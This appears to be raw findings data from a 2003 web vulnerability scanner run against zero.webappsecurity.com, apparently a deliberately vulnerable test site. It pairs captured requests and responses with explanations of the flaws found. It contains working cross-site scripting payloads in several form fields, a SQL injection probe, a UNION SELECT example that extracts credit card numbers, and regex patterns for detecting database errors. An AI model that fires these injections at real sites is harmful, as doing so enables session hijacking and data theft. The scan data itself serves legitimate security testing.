Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack>test@<script>alert(document.cookie)</script>.com</attack>test@<script>alert\(document\.cookie\)GET /join.asp?name=</textarea><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack></textarea><script>alert('XSS')</script></attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /backup/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:40 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (backup)<B>Found Directory:</B> /backup/ <p>
This general folder usually contains backup files. These files may be used to gain critical information about the server.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /join.asp?name=&email=&surname=&house=&street=&address2=</textarea><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack></textarea><script>alert('XSS')</script></attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=--><script>alert('XSS')</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:02 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 381
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = --><script>alert('XSS')</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack>--><script>alert('XSS')</script></attack>&txtLastName=Swinney--><script>alert\('XSS'\)<\/script>GET /forgot1.asp?get=' HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 360
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '[user] = ''''.</font>
<p>
<font face="Arial" size=2>/forgot1.asp</font><font face="Arial" size=2>, line 8</font> SQL Injection (')SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an insecure programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems. For example, the following SQL query would obtain the price of item number 12345:<br><br>
SELECT Price FROM Products WHERE ItemNumber = '<b>12345</b>';<br><br>
The number in bold might be supplied by the client in an HTTP GET or POST parameter, as in the following URL:<br><br>
http://www.server.com/GetItemPrice?ItemNumber=<b>12345</b><br><br>
In the example above, the client-supplied value (12345) is simply used as a numeric expression to indicate the item for which the user wants to obtain the price. The web application takes this value and inserts it into the SQL statement in between the single quotes in the WHERE clause. However, consider the following URL:<br><br>
http://www.server.com/GetItemPrice?ItemPrice?ItemNumber=<b>0' UNION SELECT CreditCardNumber FROM Customers WHERE '1'='1</b><br><br>
This would cause the web application to produce the following SQL statement:<br><br>
SELECT Price FROM Products WHERE ItemNumber = '<b>0' UNION SELECT CreditCardNumber FROM Customers WHERE '1'='1</b>';<br><br>
In this case, the client-supplied value has actually modified the SQL statement itself and 'injected' a statement of his or her choosing. Instead of the price of an item, this statement will retrieve a customer's credit card number. SQL injection can be avoided by using secure programming techniques that prevent client-supplied values from interfering with SQL statement syntax.GET <var name="path"/>?get=<attack>'</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
\[ODBC\sSQL |\[SQL\sServer\] |Microsoft\sOLE\sDB\sProvider\sfor |\[ODBC\sMicrosoft |Microsoft\sJET\sDatabase\sEngine |\[Oracle\]ORA |\[ODBC\sdriver\sfor\sOracle\] |Microsoft\sOLE\sDB\sProvider |ODBC\sError |ORA-01 |SqlException |OleDbExceptionGET /plink.asp HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:27 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 164
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = </P>
<P>The parameter "c" = </P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
IIS Permissions AssessmentIt is possible to determine the permissions that have been set on directories on IIS servers using specifically crafted requests.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"'><img%20src="javascript:alert('XSS')">&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /login/login.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 296
Content-Type: text/html
Cache-control: private
<HTML>
